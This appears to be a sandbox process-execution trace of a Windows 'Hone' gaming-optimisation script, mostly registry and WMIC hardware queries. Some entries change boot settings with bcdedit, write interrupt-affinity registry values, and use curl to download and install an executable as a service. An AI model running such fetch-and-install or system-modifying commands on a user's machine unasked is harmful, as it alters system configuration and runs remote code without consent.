reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_NetworkAdapter get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /L "VEN_"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value

C:\Windows\System32\Wbem\WMIC.exe

wmic os get TotalVisibleMemorySize /value

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NVTTweaks"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"

C:\Windows\system32\findstr.exe

findstr "HKEY"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"

C:\Windows\system32\find.exe

find "0x0"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"

C:\Windows\system32\find.exe

find "0x0"

C:\Windows\system32\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass

C:\Windows\system32\find.exe

find "0x4"

C:\Windows\system32\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority

C:\Windows\system32\find.exe

find "0x3"

C:\Windows\system32\powercfg.exe

powercfg /GetActiveScheme

C:\Windows\system32\find.exe

find "Hone"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "AllGPUTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NpiTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "TCPIP"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NvidiaTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "MemoryTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "InternetTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "ServicesTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "DebloatTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "MitigationsTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "AffinityTweaks"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"

C:\Windows\system32\reg.exe

reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"

C:\Windows\system32\find.exe

find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"

C:\Windows\system32\reg.exe

reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"

C:\Windows\system32\find.exe

find "0x400"

C:\Windows\system32\sc.exe

sc query STR

C:\Windows\system32\find.exe

find "RUNNING"

C:\Windows\system32\sc.exe

sc query HoneAudio

C:\Windows\system32\find.exe

find "RUNNING"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_Battery Get BatteryStatus

C:\Windows\system32\find.exe

find "1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_VideoController get VideoProcessor /value

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "GeForce"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "NVIDIA"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "RTX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "GTX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "AMD"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "Ryzen"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "Intel"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "UHD"

C:\Windows\system32\sc.exe

sc config "STR" start= auto

C:\Windows\system32\net.exe

net start STR

C:\Windows\system32\curl.exe

curl -g -L -# -o "C:\Hone\Resources\SetTimerResolutionService.exe" "https://github.com/auraside/HoneCtrl/raw/main/Files/SetTimerResolutionService.exe"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start STR

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /i SetTimerResolutionService.exe

C:\Windows\system32\sc.exe

sc config "STR" start=auto

C:\Windows\system32\net.exe

net start STR

C:\Windows\system32\bcdedit.exe

bcdedit /set disabledynamictick yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start STR

C:\Windows\system32\bcdedit.exe

bcdedit /deletevalue useplatformclock

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic OS get buildnumber /value

C:\Windows\System32\Wbem\WMIC.exe

wmic OS get buildnumber /value

C:\Windows\system32\bcdedit.exe

bcdedit /deletevalue useplatformtick

C:\Windows\system32\mode.com

Mode 130,45

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /L "VEN_"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_NetworkAdapter get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /L "VEN_"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value

C:\Windows\System32\Wbem\WMIC.exe

wmic os get TotalVisibleMemorySize /value

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NVTTweaks"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"

C:\Windows\system32\findstr.exe

findstr "HKEY"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"

C:\Windows\system32\find.exe

find "0x0"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"

C:\Windows\system32\find.exe

find "0x0"

C:\Windows\system32\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass

C:\Windows\system32\find.exe

find "0x4"

C:\Windows\system32\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority

C:\Windows\system32\find.exe

find "0x3"

C:\Windows\system32\powercfg.exe

powercfg /GetActiveScheme

C:\Windows\system32\find.exe

find "Hone"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "AllGPUTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NpiTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "TCPIP"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NvidiaTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "MemoryTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "InternetTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "ServicesTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "DebloatTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "MitigationsTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "AffinityTweaks"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"

C:\Windows\system32\reg.exe

reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"

C:\Windows\system32\find.exe

find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"

C:\Windows\system32\reg.exe

reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"

C:\Windows\system32\find.exe

find "0x400"

C:\Windows\system32\sc.exe

sc query STR

C:\Windows\system32\find.exe

find "RUNNING"

C:\Windows\system32\sc.exe

sc query HoneAudio

C:\Windows\system32\find.exe

find "RUNNING"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_Battery Get BatteryStatus

C:\Windows\system32\find.exe

find "1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_VideoController get VideoProcessor /value

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "GeForce"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "NVIDIA"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "RTX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "GTX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "AMD"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "Ryzen"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "Intel"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "UHD"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Hone" /v AffinityTweaks /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic cpu get NumberOfCores /value | find "="

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get NumberOfCores /value

C:\Windows\system32\find.exe

find "="

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic cpu get NumberOfLogicalProcessors /value | find "="

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get NumberOfLogicalProcessors /value

C:\Windows\system32\find.exe

find "="

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_USBController get PNPDeviceID| findstr /l "PCI\VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_USBController get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /l "PCI\VEN_"

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Enum\PCI\VEN_8086&DEV_24CD&SUBSYS_11001AF4&REV_10\3&11583659&0&20\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePolicy" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Enum\PCI\VEN_8086&DEV_24CD&SUBSYS_11001AF4&REV_10\3&11583659&0&20\Device Parameters\Interrupt Management\Affinity Policy" /v "AssignmentSetOverride" /t REG_BINARY /d "08" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get PNPDeviceID| findstr /l "PCI\VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_VideoController get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /l "PCI\VEN_"

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePolicy" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "AssignmentSetOverride" /t REG_BINARY /d "02" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID| findstr /l "PCI\VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_NetworkAdapter get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /l "PCI\VEN_"

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePolicy" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "AssignmentSetOverride" /t REG_BINARY /d "04" /f

C:\Windows\system32\mode.com

Mode 130,45

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /L "VEN_"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_NetworkAdapter get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /L "VEN_"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value

C:\Windows\System32\Wbem\WMIC.exe

wmic os get TotalVisibleMemorySize /value

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NVTTweaks"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"

C:\Windows\system32\findstr.exe

findstr "HKEY"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"

C:\Windows\system32\find.exe

find "0x0"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"

C:\Windows\system32\find.exe

find "0x0"

C:\Windows\system32\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass

C:\Windows\system32\find.exe

find "0x4"

C:\Windows\system32\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority

C:\Windows\system32\find.exe

find "0x3"

C:\Windows\system32\powercfg.exe

powercfg /GetActiveScheme

C:\Windows\system32\find.exe

find "Hone"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "AllGPUTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NpiTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "TCPIP"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NvidiaTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "MemoryTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "InternetTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "ServicesTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "DebloatTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "MitigationsTweaks"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "AffinityTweaks"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"

C:\Windows\system32\reg.exe

reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"

C:\Windows\system32\find.exe

find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"

C:\Windows\system32\reg.exe

reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"

C:\Windows\system32\find.exe

find "0x400"

C:\Windows\system32\sc.exe

sc query STR

C:\Windows\system32\find.exe

find "RUNNING"

C:\Windows\system32\sc.exe

sc query HoneAudio

C:\Windows\system32\find.exe

find "RUNNING"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_Battery Get BatteryStatus

C:\Windows\system32\find.exe

find "1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_VideoController get VideoProcessor /value

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "GeForce"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "NVIDIA"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "RTX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "GTX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "AMD"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "Ryzen"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "Intel"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "

C:\Windows\system32\find.exe

find "UHD"

C:\Windows\system32\sc.exe

sc config "STR" start= auto

C:\Windows\system32\net.exe

net start STR

C:\Windows\system32\sc.exe

sc config "STR" start=auto

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start STR

C:\Windows\system32\net.exe

net start STR

C:\Windows\system32\bcdedit.exe

bcdedit /set disabledynamictick yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start STR

C:\Windows\system32\bcdedit.exe

bcdedit /deletevalue useplatformclock

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic OS get buildnumber /value

C:\Windows\System32\Wbem\WMIC.exe

wmic OS get buildnumber /value

C:\Windows\system32\bcdedit.exe

bcdedit /deletevalue useplatformtick

C:\Windows\system32\mode.com

Mode 130,45

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /L "VEN_"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_NetworkAdapter get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /L "VEN_"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value

C:\Windows\System32\Wbem\WMIC.exe

wmic os get TotalVisibleMemorySize /value

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NVTTweaks"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"

C:\Windows\system32\findstr.exe

findstr "HKEY"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

